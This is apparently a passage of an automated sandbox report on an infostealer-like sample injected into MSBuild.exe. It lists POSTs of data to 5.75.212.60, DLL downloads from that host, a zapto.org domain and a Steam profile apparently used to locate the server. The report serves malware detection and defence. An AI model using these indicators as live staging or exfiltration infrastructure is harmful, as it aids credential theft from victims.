                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 457 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 98617 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                        Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknown TCP traffic detected without corresponding DNS query: 5.75.212.60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00405010 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 4_2_00405010
                        Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
                        Source: global traffic DNS traffic detected: DNS query: arpdabl.zapto.org
                        Source: unknown HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
                        Source: MSBuild.exe, MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.4.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359740327.000000002042D000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://5.75.212.60
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/-
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/A
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/B
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/freebl3.dll
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/freebl3.dllO
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/mozglue.dll
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/msvcp140.dll
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/msvcp140.dllFF
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/nss3.dll
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/nss3.dllQ
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/o
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/softokn3.dll
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/softokn3.dllq
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/sqls.dll
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://5.75.212.60/vcruntime140.dll
                        Source: DAECFI.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                        Source: DAECFI.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: DAECFI.4.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: DAECFI.4.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&a
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=e0OV
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: DAECFI.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: DAECFI.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: DAECFI.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://help.steampowered.com/en/
                        Source: AAFBAK.4.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: https://mozilla.org0/
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/
                        Source: MSBuild.exe, 00000004.00000002.2346186542.0000000001688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/discussions/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/market/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                        Source: file.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2346186542.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
                        Source: MSBuild.exe, 00000004.00000002.2346186542.00000000016C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997472782592
                        Source: file.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
